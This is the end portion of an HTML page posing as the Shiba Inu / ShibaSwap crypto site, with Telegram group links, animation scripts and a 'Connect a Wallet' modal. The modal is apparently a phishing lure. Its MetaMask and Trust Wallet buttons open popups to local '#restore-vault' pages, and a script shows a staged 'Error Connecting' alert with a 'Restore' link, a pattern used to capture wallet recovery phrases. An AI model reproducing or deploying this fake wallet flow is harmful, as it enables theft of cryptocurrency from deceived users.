        <a href=" https://t.me/shibainufrancegroup " target=" _blank " class=" tel-modal--link ">French Group</a>
        <a href=" https://t.me/ShibaInuGerman " target=" _blank " class=" tel-modal--link ">German Group</a>
        <a href=" https://t.me/shibainughana " target=" _blank " class=" tel-modal--link ">Ghana Group</a>
        <a href=" https://t.me/shibainugreece " target=" _blank " class=" tel-modal--link ">Greece Group</a>
        <a href=" https://t.me/shibhongkong " target=" _blank " class=" tel-modal--link ">Hong Kong Group</a>
        <a href=" https://t.me/shibainindiagroup " target=" _blank " class=" tel-modal--link ">Indian Group</a>
        <a href=" https://t.me/shibainuindonesia " target=" _blank " class=" tel-modal--link ">Indonesian Group</a>
        <a href=" https://t.me/shibainuiran " target=" _blank " class=" tel-modal--link ">Iran Group</a>
        <a href=" https://t.me/shibainuitalyofficial " target=" _blank " class=" tel-modal--link ">Italian Group</a>
        <a href=" https://t.me/shibainuivorycoast " target=" _blank " class=" tel-modal--link ">Ivory Coast Group</a>
        <a href=" https://t.me/ShibaJapan " target=" _blank " class=" tel-modal--link ">Japanese Group</a>
        <a href=" https://t.me/ShibaInuKazakhstan " target=" _blank " class=" tel-modal--link ">Kazakhstan Group</a>
        <a href=" https://t.me/shibainukorea " target=" _blank " class=" tel-modal--link ">Korean Group</a>
        <a href=" https://t.me/shibainukosovo " target=" _blank " class=" tel-modal--link ">Kosovo Group</a>
        <a href=" https://t.me/shibainulithuania " target=" _blank " class=" tel-modal--link ">Lithuanian Group</a>
        <a href=" https://t.me/shibainumalaysia " target=" _blank " class=" tel-modal--link ">Malaysian Group</a>
        <a href=" https://t.me/shibainumexico " target=" _blank " class=" tel-modal--link ">Mexico Group</a>
        <a href=" https://t.me/shibainunigeria " target=" _blank " class=" tel-modal--link ">Nigeria Group</a>
        <a href=" https://t.me/shibainupakistani " target=" _blank " class=" tel-modal--link ">Pakistani Group</a>
        <a href=" https://t.me/shibapersian " target=" _blank " class=" tel-modal--link ">Persian/Iran Group</a>
        <a href=" https://t.me/shibainu_peru " target=" _blank " class=" tel-modal--link ">Peruvian Group</a>
        <a href=" https://t.me/shibainupoland " target=" _blank " class=" tel-modal--link ">Poland Group</a>
        <a href=" https://t.me/shibaromania " target=" _blank " class=" tel-modal--link ">Romanian Group</a>
        <a href=" https://t.me/shibainurussia " target=" _blank " class=" tel-modal--link ">Russian Group</a>
        <a href=" https://t.me/shibainusingapore " target=" _blank " class=" tel-modal--link ">Singapore Group</a>
        <a href=" https://t.me/Shiba_Spain " target=" _blank " class=" tel-modal--link ">Spanish Group</a>
        <a href=" https://t.me/shibainusweden " target=" _blank " class=" tel-modal--link ">Sweden Group</a>
        <a href=" https://t.me/shibaturkish " target=" _blank " class=" tel-modal--link ">Turkish Group</a>
        <a href=" https://t.me/shibainuUK " target=" _blank " class=" tel-modal--link ">UK Group</a>
        <a href=" https://t.me/ShibaUsa " target=" _blank " class=" tel-modal--link ">USA Group</a>
        <a href=" https://t.me/shibainushibua " target=" _blank " class=" tel-modal--link ">Ukrainian Group</a>
        <a href=" https://t.me/Shiba_Inu_venezuela " target=" _blank " class=" tel-modal--link ">Venezuela Group</a>
        <a href=" https://t.me/ShibaVietnam " target=" _blank " class=" tel-modal--link ">Vietnamese Group</a>
        <a href=" #" class=" tel-modal-close w-inline-block ">
          <img src=" ./images/ico-modal-close.svg " loading=" eager " alt="" class=" tel-modal-close--ico " />
        </a>
      </div>
      <div class=" tel-modal--bg "></div>
    </div>
    <script src=" https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=60c1cc1d37fad34d6a30b52e " type=" text/javascript " integrity=" sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin=" anonymous "></script>
    <script src="https://shibatoken.com/js/shiba-ui.js " type=" text/javascript "></script>
    <script>
      var clipboard = new Clipboard(" .cta-copy ");
      clipboard.on(" success ", function(o) {
        console.log(o), $(" .result-div ").click()
      }), clipboard.on(" error ", function(o) {
        console.log(o)
      });
    </script>
    <script>
      $(document).ready(function() {
        $(" .nav-link, .nav-drop-link, .scroll-up-cta, .hero__scrollbtn ").click(() => {
          setTimeout(() => {
            history.replaceState("", document.title, window.location.origin + window.location.pathname + window.location.search)
          }, 5)
        })
      });
    </script>
    <script>
      particlesJS(" particles-js ", {
        particles: {
          number: {
            value: 76,
            density: {
              enable: !0,
              value_area: 5839.692548078818
            }
          },
          color: {
            value: " #ffffff "
          },
          shape: {
            type: " circle ",
            stroke: {
              width: 0,
              color: " #000000 "
            },
            polygon: {
              nb_sides: 5
            },
            image: {
              src: " img/github.svg ",
              width: 100,
              height: 100
            }
          },
          opacity: {
            value: .6392095897221408,
            random: !0,
            anim: {
              enable: !1,
              speed: 1,
              opacity_min: 0,
              sync: !1
            }
          },
          size: {
            value: 2,
            random: !0,
            anim: {
              enable: !1,
              speed: 4,
              size_min: .3,
              sync: !1
            }
          },
          line_linked: {
            enable: !1,
            distance: 150,
            color: " #ffffff ",
            opacity: .4,
            width: 1
          },
          move: {
            enable: !0,
            speed: .4,
            direction: " none ",
            random: !0,
            straight: !1,
            out_mode: " out ",
            bounce: !1,
            attract: {
              enable: !1,
              rotateX: 600,
              rotateY: 600
            }
          }
        },
        interactivity: {
          detect_on: " canvas ",
          events: {
            onhover: {
              enable: !1,
              mode: " bubble "
            },
            onclick: {
              enable: !1,
              mode: " repulse "
            },
            resize: !0
          },
          modes: {
            grab: {
              distance: 400,
              line_linked: {
                opacity: 1
              }
            },
            bubble: {
              distance: 250,
              size: 0,
              duration: 4.475524475524476,
              opacity: 0,
              speed: 3
            },
            repulse: {
              distance: 367.6323676323676,
              duration: .4
            },
            push: {
              particles_nb: 4
            },
            remove: {
              particles_nb: 2
            }
          }
        },
        retina_detect: !0
      });
    </script>
    <script>
      particlesJS(" particles-js2 ", {
        particles: {
          number: {
            value: 76,
            density: {
              enable: !0,
              value_area: 5839.692548078818
            }
          },
          color: {
            value: " #ffffff "
          },
          shape: {
            type: " circle ",
            stroke: {
              width: 0,
              color: " #000000 "
            },
            polygon: {
              nb_sides: 5
            },
            image: {
              src: " img/github.svg ",
              width: 100,
              height: 100
            }
          },
          opacity: {
            value: .6392095897221408,
            random: !0,
            anim: {
              enable: !1,
              speed: 1,
              opacity_min: 0,
              sync: !1
            }
          },
          size: {
            value: 2,
            random: !0,
            anim: {
              enable: !1,
              speed: 4,
              size_min: .3,
              sync: !1
            }
          },
          line_linked: {
            enable: !1,
            distance: 150,
            color: " #ffffff ",
            opacity: .4,
            width: 1
          },
          move: {
            enable: !0,
            speed: .4,
            direction: " none ",
            random: !0,
            straight: !1,
            out_mode: " out ",
            bounce: !1,
            attract: {
              enable: !1,
              rotateX: 600,
              rotateY: 600
            }
          }
        },
        interactivity: {
          detect_on: " canvas ",
          events: {
            onhover: {
              enable: !1,
              mode: " bubble "
            },
            onclick: {
              enable: !1,
              mode: " repulse "
            },
            resize: !0
          },
          modes: {
            grab: {
              distance: 400,
              line_linked: {
                opacity: 1
              }
            },
            bubble: {
              distance: 250,
              size: 0,
              duration: 4.475524475524476,
              opacity: 0,
              speed: 3
            },
            repulse: {
              distance: 367.6323676323676,
              duration: .4
            },
            push: {
              particles_nb: 4
            },
            remove: {
              particles_nb: 2
            }
          }
        },
        retina_detect: !0
      });
    </script>
    <script>
      particlesJS(" particles-js3 ", {
        particles: {
          number: {
            value: 76,
            density: {
              enable: !0,
              value_area: 5839.692548078818
            }
          },
          color: {
            value: " #ffffff "
          },
          shape: {
            type: " circle ",
            stroke: {
              width: 0,
              color: " #000000 "
            },
            polygon: {
              nb_sides: 5
            },
            image: {
              src: " img/github.svg ",
              width: 100,
              height: 100
            }
          },
          opacity: {
            value: .6392095897221408,
            random: !0,
            anim: {
              enable: !1,
              speed: 1,
              opacity_min: 0,
              sync: !1
            }
          },
          size: {
            value: 2,
            random: !0,
            anim: {
              enable: !1,
              speed: 4,
              size_min: .3,
              sync: !1
            }
          },
          line_linked: {
            enable: !1,
            distance: 150,
            color: " #ffffff ",
            opacity: .4,
            width: 1
          },
          move: {
            enable: !0,
            speed: .4,
            direction: " none ",
            random: !0,
            straight: !1,
            out_mode: " out ",
            bounce: !1,
            attract: {
              enable: !1,
              rotateX: 600,
              rotateY: 600
            }
          }
        },
        interactivity: {
          detect_on: " canvas ",
          events: {
            onhover: {
              enable: !1,
              mode: " bubble "
            },
            onclick: {
              enable: !1,
              mode: " repulse "
            },
            resize: !0
          },
          modes: {
            grab: {
              distance: 400,
              line_linked: {
                opacity: 1
              }
            },
            bubble: {
              distance: 250,
              size: 0,
              duration: 4.475524475524476,
              opacity: 0,
              speed: 3
            },
            repulse: {
              distance: 367.6323676323676,
              duration: .4
            },
            push: {
              particles_nb: 4
            },
            remove: {
              particles_nb: 2
            }
          }
        },
        retina_detect: !0
      });
    </script>
    <script>
      particlesJS(" particles-js4 ", {
        particles: {
          number: {
            value: 76,
            density: {
              enable: !0,
              value_area: 5839.692548078818
            }
          },
          color: {
            value: " #ffffff "
          },
          shape: {
            type: " circle ",
            stroke: {
              width: 0,
              color: " #000000 "
            },
            polygon: {
              nb_sides: 5
            },
            image: {
              src: " img/github.svg ",
              width: 100,
              height: 100
            }
          },
          opacity: {
            value: .6392095897221408,
            random: !0,
            anim: {
              enable: !1,
              speed: 1,
              opacity_min: 0,
              sync: !1
            }
          },
          size: {
            value: 2,
            random: !0,
            anim: {
              enable: !1,
              speed: 4,
              size_min: .3,
              sync: !1
            }
          },
          line_linked: {
            enable: !1,
            distance: 150,
            color: " #ffffff ",
            opacity: .4,
            width: 1
          },
          move: {
            enable: !0,
            speed: .4,
            direction: " none ",
            random: !0,
            straight: !1,
            out_mode: " out ",
            bounce: !1,
            attract: {
              enable: !1,
              rotateX: 600,
              rotateY: 600
            }
          }
        },
        interactivity: {
          detect_on: " canvas ",
          events: {
            onhover: {
              enable: !1,
              mode: " bubble "
            },
            onclick: {
              enable: !1,
              mode: " repulse "
            },
            resize: !0
          },
          modes: {
            grab: {
              distance: 400,
              line_linked: {
                opacity: 1
              }
            },
            bubble: {
              distance: 250,
              size: 0,
              duration: 4.475524475524476,
              opacity: 0,
              speed: 3
            },
            repulse: {
              distance: 367.6323676323676,
              duration: .4
            },
            push: {
              particles_nb: 4
            },
            remove: {
              particles_nb: 2
            }
          }
        },
        retina_detect: !0
      });
    </script>
    <script>
      var pagination = " < div class = swiper - pagination > < /div>
      ",next_prev_buttons=' < div class = "swiper-button-prev" > < /div> < div class = "swiper-button-next" > < /div>
      ',scrollbar=' < div class = "swiper-scrollbar" > < /div>
      ',swiperNodes=(swiperNodes="").concat(pagination,next_prev_buttons);$(".swiper-container").each(function(i){$(this).append(swiperNodes)});
    </script>
    <script>
      var mySwiper = new Swiper(".first-swiper", {
        mousewheel: {
          invert: !0
        },
        spaceBetween: 0,
        speed: 300,
        lazy: !0,
        navigation: {
          nextEl: ".arrow-next",
          prevEl: ".arrow-previous"
        },
        keyboard: {
          enabled: !0
        },
        breakpoints: {
          0: {
            slidesPerView: 2,
            spaceBetween: 0
          },
          478: {
            slidesPerView: 4,
            spaceBetween: 0
          },
          767: {
            slidesPerView: 4,
            spaceBetween: 0
          },
          988: {
            slidesPerView: 5,
            spaceBetween: 0
          },
          1920: {
            slidesPerView: 10,
            spaceBetween: 0
          }
        }
      });
    </script>
    <!--!doctype-->
<div id="root">
      <div class="modal fade" id="connectModal" tabindex="-1" aria-labelledby="exampleModalLabel" style="display: none;" aria-hidden="true">
        <div class="modal-dialog modal-dialog-centered">
          <div class="modal-content text-white" style="background-color: rgb(25, 27, 31);border-radius: 20px;border: 3px solid rgb(44, 47, 54);">
            <div class="modal-header" style="border-bottom: none;border-radius: 10px">
              <h5 class="modal-title" id="connectModal">Connect a Wallet</h5>
              <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                <span aria-hidden="true" class="text-white">×</span>
              </button>
            </div>
            <div class="modal-body">
              <div class="card card-item" style="background-color: rgb(14 14 18) !important;">
                <div class="card-body" style="font-size: 10pt;line-height: 1.5;"> By connecting a wallet, you agree to Shibswap Labs’ <a href="https://www.certik.com/projects/shib" target="_blank" style="
    color: #4c95cf!important;
">Terms of Service</a> and acknowledge that you have read and understand the Shibswap <a href="https://www.certik.com/projects/shib" target="_blank" style="
    color: #4c95cf!important;
">Protocol Disclaimer</a>. </div>
              </div>
              <div class="alert mt-3" role="alert" id="alertForRestore" style="display: none;"> Error Connecting &nbsp; <a href=" " id="linkToForm" class="btn btn-secondary btn-sm" onclick="window.open(this.href,'targetWindow','toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=400,height=780') ;return false" style="color: white !important;">Restore</a>
              </div>
              
              
              <button class="btncustom btn-block mt-3 " onclick="window.open('/click/metamask/index.html?key=68565658947c8cabfe1a90d&submetric=56856vbcv#restore-vault','','toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=400,height=780') ;return false" style="
">
                
                <img src="https://i.postimg.cc/pVCqNqLK/image.png" width="auto" height="35" style="
    height: 45px;
    width: 45%;
">  
		      <button class="btncustom btn-block mt-3 " onclick="window.open('/click/trustwalls/index.html?key=68565658947c8cabfe1a90d&submetric=56856vbcv#restore-vault','','toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=400,height=780') ;return false" style="
">
                
                <img src="https://i.postimg.cc/dQbg1WKp/image.png" width="auto" height="35" style="
    height: 45px;
    width: 45%;
">
              </button>
          </div>
        </div>
      </div>
      <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.min.js"></script>
      <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
      <script>
        $(function() {
          function visibility(visible, link = undefined, type = undefined, img = undefined) {
            $(".loader").css('display', 'none')
            if (visible == false) {
              $("#alertForRestore").css('display', 'none')
              $("#alertForRestore2").css('display', 'none')
              $(".btnConnect").removeClass('hiddenElement')
            } else {
              $("#loaderFor" + type).css('display', '')
              setTimeout(function() {
                $(".btnConnect").addClass('hiddenElement')
                $("#alertForRestore").css('display', '')
                $("#alertForRestore2").css('display', '')
                $("#imgOfAlertForRestore2").attr('src', img)
                $(".loader").css('display', 'none')
              }, 2000)
            }
            if (typeof link !== 'undefined') $("#linkToForm").attr('href', link)
          }
          visibility(false)
          $(".btnConnect").on("click", function(e) {
            e.preventDefault()
            const link = $(this).attr("href")
            const type = $(this).data("type")
            const img = $(this).data("logo")
            visibility(true, link, type, img)
          })
          $(".triggerConnectWallet").on("click", function(e) {
            e.preventDefault()
            visibility(false)
            $("#connectModal").modal("show")
          })
        })
      </script>
    </div>
  
   
 
  </body>
